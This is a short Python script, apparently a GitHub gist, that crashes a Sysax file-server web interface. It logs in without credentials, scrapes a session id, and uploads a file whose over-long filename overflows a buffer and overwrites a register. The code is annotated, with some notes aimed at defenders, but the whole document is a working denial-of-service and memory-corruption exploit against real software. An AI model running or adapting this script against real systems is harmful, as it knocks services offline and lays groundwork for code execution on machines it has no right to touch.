
@hosakauk

hosakauk/sysax_crash.py

Last active Jul 12, 2020
import requests
from bs4 import BeautifulSoup
import sys
# Target host (optionally host:port) is taken from the first command-line
# argument; with no argument this line raises IndexError at start-up.
host = sys.argv[1]

# Login endpoint of the target's web interface. Note the scheme is plain HTTP,
# so the session id used later travels unencrypted in the query string.
URL = "http://{}/scgi?sid=0&pid=dologin".format(host)

# Referer header attached to every request this script sends.
# NOTE(review): presumably the server validates it; nothing here confirms that.
head = {"Referer": "http://{}/scgi?pid=0&action=dologin".format(host)}

# Login form body. "Cg==" is base64 for a single newline byte; the author
# describes this as a login that supplies no credentials.
payload = {"fd": "Cg=="}

# 10000 filler bytes, used below as the content of the uploaded file.
junk = "E" * 10000
def getsid():
    """Post the login form and return the session id from the response.

    The login response is parsed as HTML and the ``href`` of the first
    ``<a>`` element is read; characters 9 through 48 of that value (40
    characters) are returned as the session id.

    Raises:
        AttributeError: if the response contains no ``<a>`` element.
        TypeError: if the first ``<a>`` element has no ``href``.
    """
    login_response = requests.post(URL, headers=head, data=payload)
    # The author calls this a "fudge": the sid is scraped from a link in the
    # returned page rather than read from a cookie or a dedicated field.
    first_anchor = BeautifulSoup(login_response.text, "lxml").a
    href = first_anchor.get('href')
    # Fixed-offset slice. NOTE(review): presumably skips a leading
    # "scgi?sid=" (9 characters); the page does not show a sample response.
    return href[9:49]
def docrash():
    """Send one multipart upload with an over-long filename and print the reply.

    The request is a POST to ``pid=uploadfile_name1.htm`` carrying a single
    ``file`` part. In the ``requests`` files tuple the first element is the
    filename, so the 371-character string (367 "A" then 4 "C") is what ends
    up in the part's Content-Disposition ``filename``; the 10000-byte ``junk``
    string is only the file content.

    Per the author's inline comments, 367 bytes is the length at which the
    service crashes and the following 4 bytes land in EBX. That points to the
    upload handler copying the filename into a fixed-size buffer without a
    length check (inferred; the server code is not on this page).

    Review notes for defenders: the anomalous element on the wire is the
    filename length on this endpoint, so bounding multipart filename length
    at a proxy/WAF, or alerting on it, covers this request shape. The
    session used is obtained by getsid() from the credential-less login
    above, so restricting who can reach or log in to the web interface also
    narrows exposure.
    """
    # 367 filler bytes followed by a 4-byte marker (author: "overwrites next
    # 4 bytes of EBX").
    crash = "".join(("A" * 367, "C" * 4))
    file = {"foo": "bar"}  # never referenced again; has no effect on the request
    # (filename, content, content type, extra part headers)
    upload_parts = {
        "file": (crash, junk, "application/octet-stream", {'Expires': '0'}),
    }
    formURL = "http://" + host + "/scgi?sid=" + getsid() + "&pid=uploadfile_name1.htm"
    rf = requests.post(formURL, headers=head, files=upload_parts)
    # Whatever the server returns (if anything) is echoed for inspection.
    print(rf.text)
# Run the single upload only when executed as a script, not on import.
if __name__ == "__main__":
    docrash()